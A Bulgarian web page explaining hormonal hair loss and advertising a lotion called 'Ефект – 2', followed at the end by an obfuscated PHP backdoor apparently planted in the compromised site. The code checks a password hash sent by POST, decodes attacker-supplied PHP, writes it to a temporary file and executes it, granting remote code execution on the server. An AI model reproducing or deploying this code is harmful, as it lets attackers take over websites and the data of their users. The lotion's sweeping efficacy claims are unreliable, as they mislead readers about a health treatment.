Хормонално лечение на косопад | Косопад

Лечение на косопад с андрогени

Хормонално лечение на косопад

Косопад при мъжете

Косопад при мъжете

Съществуват много форми на оплешивяване и косопад, както и много причини за тяхната поява. Несъмнено, сред основните се нареждат наследствените генетични фактори и реакцията от хормоналния дисбаланс, които играят основна роля при почти една трета от плешивите мъже и около една пета от жените с подобни проблеми.

Когато има оплешивяване като следствие на промени в нивата на андрогените, в тялото на човека протичат определени процеси. При тях мъжкият хормон тестостерон се превръща в ДХТ (дихидротестостерон), която трансформация се извършва при съществуването на ензим 5 алфа – редуктаза. Вследствие на процесите, ДХТ се натрупва в рецепторите на космените фоликули и на практика ги задушава.

Самото оплешивяване се предизвиква от невъзможността на кръвоносните съдове в тези области да извършват обичайната си дейност, вследствие от възникналото удебеляване и втвърдяване на космените влакна. Настъпва силен недостиг на необходимите хранителни вещества и това разстройва естествения цикъл. Старите косми падат, но на тяхно място не се появяват нови.

Лечение на оплешивяване с андрогени

В някои случаи, за лечение на оплешивяване се използват така наречените локални андрогени. Те могат да бъдат полезни при някои форми на косопад както при мъжете, така и при дамите. Имат свойството да се прикрепват към рецепторите на дихидротестостерона и да ги блокират, като по този начин предотвратяват тяхното отрицателно въздействие върху космите. За да се приложи успешно тази методика обаче, косопадът трябва да бъде установен още в начална фаза.

Успешната алтернатива на лосион срещу оплешивяване и косопад „Ефект – 2”

Специалистите препоръчват перфектния лосион „Ефект – 2”, който е несъмненият шампион в борбата с косопада и оплешивяването. Направен е изцяло от природни съставки и оказва благотворно въздействие при всички случаи, независимо от фазата на развитието на болестта. Повече за „Ефект – 2” прочетете тук.

препарат против косопад

Ефект -2 срещу косопад и оплешивяване

18. април 2013 10:31:50 от Косопад
Категории: Лосион срещу косопад, Срещу косопад - Ефект 2 | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}